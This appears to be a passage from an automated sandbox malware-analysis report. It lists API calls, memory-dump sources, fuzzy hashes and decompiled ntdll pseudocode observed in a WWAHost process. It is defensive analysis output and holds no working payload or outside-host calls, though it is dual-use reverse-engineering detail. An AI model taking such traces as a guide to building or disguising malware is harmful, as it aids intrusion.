Instruction Fuzzy Hash: D7F08CB26002146BDB10EF98CC44FE777ADEF84710F1485A9FD8C5B202CA30E9258BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CAB0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02D4CB04

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: bec94458cd42806910d4d3acd5553c417a3fa2ad3fa69b939821d7d23a8d2164
Instruction ID: 7bdb72d3fae195ae83585e33ab46d24370224f6354c6a640c18b1dcfc2077e42
Opcode Fuzzy Hash: bec94458cd42806910d4d3acd5553c417a3fa2ad3fa69b939821d7d23a8d2164
Instruction Fuzzy Hash: CB01B2B2210108BFCB58DF89DC80EEB77AEAF8C754F118258BA4D97240C630EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4B550 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,CF742C5C,00000000,00000000,?,?,?,CF742C5C,?), ref: 02D4B58C

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: bd4465d483146d44be78076736bc1b4778d7214cd568c3cb47caf5ee2cc35c75
Instruction ID: a158ed89e8a0d69deb982a889c241f3db0967856949dc48e99b864da78418b4a
Opcode Fuzzy Hash: bd4465d483146d44be78076736bc1b4778d7214cd568c3cb47caf5ee2cc35c75
Instruction Fuzzy Hash: 59E0923338131437E33062AD9C02FABB79DDB94B65F540026FA4DEB2C0DA95F90146E4

Uniqueness

Uniqueness Score: -1.00%

Function 02D3ABB3 Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D3AC32

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d3e861d40e3d6a2e76212e78234dace5dce7600e0b0e2fdb41de685369d45ce4
Instruction ID: d67c4318152cbfb452bd2028359f8ae322db8d8f759e3aa3ae2ec51b0046c90f
Opcode Fuzzy Hash: d3e861d40e3d6a2e76212e78234dace5dce7600e0b0e2fdb41de685369d45ce4
Instruction Fuzzy Hash: CDF0A7B5A0010DABDB00DF94EC41F9DB775DB41718F148354E519DB382EB71DB058B50

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CB91 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D3DC32,02D3DC32,?,00000000,?,?), ref: 02D4CBD0

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2466a992df934e8620df8235b7957559ec6af6e618f92204478871ee74a599fc
Instruction ID: 125e843e83ab9309a6dc787a7302c5e79d56d4b63e6a0be62b9dcda0e6b0e537
Opcode Fuzzy Hash: 2466a992df934e8620df8235b7957559ec6af6e618f92204478871ee74a599fc
Instruction Fuzzy Hash: 1FF030B1740214AFC720EF55CC85EEB3B6AEF84764F108568F90D97255D631EC058AE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D3E2D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(02D43CF2,?,?,02D43CF2,00000000,?), ref: 02D3E2FA

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7dae8409021b378cdc820bc000cedab52007afc8d6757658cd2c406443500b0c
Instruction ID: 8f3604fc29fb97f373eb1c189ff53058a0c1bcc0eae8d11563fb9c2051ab42f1
Opcode Fuzzy Hash: 7dae8409021b378cdc820bc000cedab52007afc8d6757658cd2c406443500b0c
Instruction Fuzzy Hash: D5E0867125020427FB2467A8DC49F6A33588F88628F184650FD9DDB3D1D774FD41C554

Uniqueness

Uniqueness Score: -1.00%

Function 02D3E2CA Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(02D43CF2,?,?,02D43CF2,00000000,?), ref: 02D3E2FA

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 37b2379a9182e8c9b9dba58a3902b84643d71ee487690ad60375e827cfb2c4fe
Instruction ID: 01f166785bcc16d094f3f45bd8d68e2ed87faf9d276f00417d18e989b6ce5ff8
Opcode Fuzzy Hash: 37b2379a9182e8c9b9dba58a3902b84643d71ee487690ad60375e827cfb2c4fe
Instruction Fuzzy Hash: 53E0867155030416FB2167B8DD4AB6E37144F45238F180B54F9BA9B2D3D738ED42C625

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CA40 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 02D4CA6D

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction ID: b7a47831d44e5177e8ff9bf64da8e0a7dafe5954dad63102c0f8dbc33fb6d6e7
Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction Fuzzy Hash: 35E012B1210208ABDB14EF89DC48EAB37ADEF88750F018158BA095B341CA30E9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CA00 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D469E6,?,02D4718D,02D4718D,?,02D469E6,?,?,?,?,?,00000000,00000005,00000206), ref: 02D4CA2D

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction ID: e4c383fb028b9449bd18ffd912fd8f17e8d6b0030c53573fb9b05d1a413ffe9c
Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction Fuzzy Hash: 35E046B1200208ABDB18EF99DC48EAB37ADEF88754F018158FE095B341CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CBA0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D3DC32,02D3DC32,?,00000000,?,?), ref: 02D4CBD0

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction ID: 192c700865019027011b7c04b599b6967efe56245c0fa0efe4b5d257ade88270
Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction Fuzzy Hash: DCE01AB12002086BD710EF49CC45EE737ADEF88650F118158BA0957341C630E8108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D3E0DA Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02D3889A,?), ref: 02D3E10B

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5e219a354f52580b3bebf516e4969a9ad5320207455284d4873e4bf05cb2977a
Instruction ID: bb89889d37137bc238dd1610654096982803d6f5503c21cb828c39026d1a936e
Opcode Fuzzy Hash: 5e219a354f52580b3bebf516e4969a9ad5320207455284d4873e4bf05cb2977a
Instruction Fuzzy Hash: 9FD05E716902007AF624E7E09E57F2BB2959B85705F090865EA1AAA3C2DE24A5008660

Uniqueness

Uniqueness Score: -1.00%

Function 02D3E0E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02D3889A,?), ref: 02D3E10B

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 090e36ee1d11bb142e47d988bbf65383c802cbd94f62c7929ce083ef9e77bf89
Instruction ID: c79c51e6be73a52d083e545414f016200db339e6f578313515d5df2df18e0e88
Opcode Fuzzy Hash: 090e36ee1d11bb142e47d988bbf65383c802cbd94f62c7929ce083ef9e77bf89
Instruction Fuzzy Hash: 19D0A77169030437F620E7E4DC07F1673CD9B48A44F050060F908D73C2DA60F90045A4

Uniqueness

Uniqueness Score: -1.00%

Function 04022B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022B44

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1a56ebb84b8ba752d02cb249ea00b6eb55611e285ef8302e00f66dd096e4210
Instruction ID: 847e36e83a10cf3355cde0726325f52167fe12200b0a06256e3b57beb2b8e71b
Opcode Fuzzy Hash: a1a56ebb84b8ba752d02cb249ea00b6eb55611e285ef8302e00f66dd096e4210
Instruction Fuzzy Hash: B5B09B729014D5C5FB51EB60470C7177D4467D1745F15C4D5E1461645E4738D091F175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02D38864 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbdc7ca2ae7631290da2d01b3f4c0cea1c183cac136bc2e2313d3f254bcf06b3
Instruction ID: 5aa418a94f4fd7dd7c5025c41571aa9b57330bb97bf2e011544774be4586eec9
Opcode Fuzzy Hash: fbdc7ca2ae7631290da2d01b3f4c0cea1c183cac136bc2e2313d3f254bcf06b3
Instruction Fuzzy Hash: 48C08CE7FE120812C7104C4D7C837B0F361E38312FF8821A7DE08A7242E582A22100CE

Uniqueness

Uniqueness Score: -1.00%

Function 04017550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04017550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x40db370 ^ _t107;
				_v8 =  *0x40db370 ^ _t107;
				_t105 = __ecx;
				if( *0x40d6664 == 0) {
					L5:
					return E04024B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E03FEE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E04017738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E0401763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E04022B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E040176ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E0406EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E04028F40( &_v548, 0, 0x214);
						_t106 =  *0x40d6664;
						_t110 = _t108 + 0x20;
						 *0x40d91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x40d6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E04024C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E0406EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E0402A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E0406EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E0402A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E0406EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E0405CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E0406EF10();
						goto L15;
					}
					L8:
					_t56 = E04017648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x04017560
0x04017562
0x0401756f
0x04017571
0x040175ab
0x040175b9
0x040175b9
0x04017579
0x04017583
0x0401758f
0x04054443
0x04017595
0x0401759e
0x0401759e
0x040175a2
0x040175bc
0x040175c2
0x040175c7
0x040175c9
0x04017621
0x04017623
0x04017624
0x040175f8
0x040175ff
0x04017601
0x0401762c
0x04017603
0x04017609
0x04017610
0x04017612
0x04017612
0x04017612
0x04017614
0x04017616
0x04017630
0x04017633
0x04017633
0x04017618
0x0401761a
0x040545c9
0x040545c9
0x040545d1
0x040545d2
0x040545d4
0x040545d6
0x040545d6
0x00000000
0x0401761a
0x040175ce
0x040175d4
0x040175da
0x040175df
0x040175e1
0x0405444a
0x04054450
0x00000000
0x00000000
0x04054456
0x04054469
0x04054476
0x04054486
0x0405448b
0x04054497
0x040544b9
0x040544bf
0x040544c1
0x040544c3
0x00000000
0x00000000
0x040544c9
0x040544cf
0x040544d1
0x00000000
0x00000000
0x040544dc
0x040544de
0x00000000
0x00000000
0x040544e6
0x040544ed
0x040544ef
0x040545c4
0x00000000
0x040545c4
0x040544f7
0x040544f8
0x04054510
0x04054515
0x04054524
0x0405452b
0x0405452c
0x0405452e
0x04054556
0x04054561
0x04054567
0x04054569
0x0405456c
0x0405456e
0x04054574
0x04054576
0x00000000
0x00000000
0x00000000
0x00000000
0x0405457c
0x0405457c
0x04054584
0x04054588
0x0405458a
0x0405458c
0x0405458e
0x0405458e
0x0405459b
0x040545a0
0x040545a7
0x040545ac
0x040545ae
0x00000000
0x00000000
0x040545b4
0x040545b4
0x040545b7
0x040545b7
0x00000000
0x040545bf
0x04054530
0x04054535
0x04054537
0x04054539
0x00000000
0x0405453e
0x040175e7
0x040175e9
0x040175ee
0x040175f0
0x00000000
0x00000000
0x040175f2
0x00000000
0x040175a4
0x040175a4
0x040175a4
0x00000000
0x040175a4

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 04054592
Execute=1, xrefs: 0405451E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0405454D
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04054507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04054530
ExecuteOptions, xrefs: 040544AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04054460

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 29ce4b081fd65a181ba0d1d0fd722ede7157c6037f821f5179cffdddefae8e22
Instruction ID: 137a636df8b06839e25988166b7572ef8ea713af3438f09e0a78d08672b582e8
Opcode Fuzzy Hash: 29ce4b081fd65a181ba0d1d0fd722ede7157c6037f821f5179cffdddefae8e22
Instruction Fuzzy Hash: 6751C931640219AAEF10FFA4DD95FEE73A8EF04308F0405A9E906B7192EB70BE55DE51

Uniqueness

Uniqueness Score: -1.00%

Function 03FE9046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E03FE9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x40bbe98);
				E04037C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E04028F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E03FF9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x40d65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E03FFA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E04005A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E040004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x40d65e0; // 0x75f8a680
							 *0x40d91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x40d65e8; // 0x776c7740
									if(_t148 != 0) {
										 *0x40d91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E03FFDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E03FF3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E03FF9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E0404247B();
									goto L26;
								} else {
									_t152 = E03FFA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E040004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x03fe9046
0x03fe9046
0x03fe904b
0x03fe9050
0x03fe9055
0x03fe905b
0x03fe905d
0x03fe9066
0x03fe906f
0x03fe9078
0x03fe9080
0x03fe9088
0x03fe908f
0x03fe9095
0x03fe90a9
0x03fe90b1
0x03fe90be
0x03fe90c6
0x03fe90cf
0x03fe90e2
0x03fe90f7
0x03fe90fb
0x03fe9118
0x00000000
0x03fe9123
0x03fe913b
0x03fe913f
0x00000000
0x00000000
0x03fe9147
0x0404231f
0x0404231f
0x00000000
0x0404231f
0x03fe9154
0x04042330
0x04042336
0x04042336
0x03fe915a
0x03fe915a
0x03fe915a
0x03fe9161
0x03fe9167
0x03fe916b
0x03fe9172
0x03fe9182
0x03fe918e
0x03fe9199
0x03fe91ba
0x03fe91be
0x00000000
0x03fe91e0
0x04042358
0x04042360
0x04042368
0x0404236a
0x04042372
0x00000000
0x04042378
0x04042378
0x04042381
0x04042458
0x04042458
0x0404245b
0x04042463
0x04042468
0x0404246e
0x0404246e
0x040424a7
0x00000000
0x040424a7
0x0404238f
0x04042396
0x0404239c
0x0404239f
0x0404239f
0x040423bb
0x040423c8
0x040423ca
0x040423d2
0x0404244c
0x0404244c
0x04042453
0x00000000
0x040423d4
0x040423e7
0x040423e9
0x040423f1
0x00000000
0x00000000
0x040423f9
0x04042402
0x04042408
0x0404240c
0x04042413
0x04042423
0x0404243f
0x00000000
0x00000000
0x04042441
0x04042446
0x04042446
0x00000000
0x04042446
0x040423fb
0x00000000
0x040423fb
0x040423d2
0x00000000
0x04042372
0x03fe91be
0x03fe9118
0x03fe90fd
0x03fe9102
0x03fe910e

Strings

@wlw, xrefs: 0404245B
@, xrefs: 03FE9095
$, xrefs: 03FE90B1

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID:
String ID: $$@$@wlw
API String ID: 0-3581332286
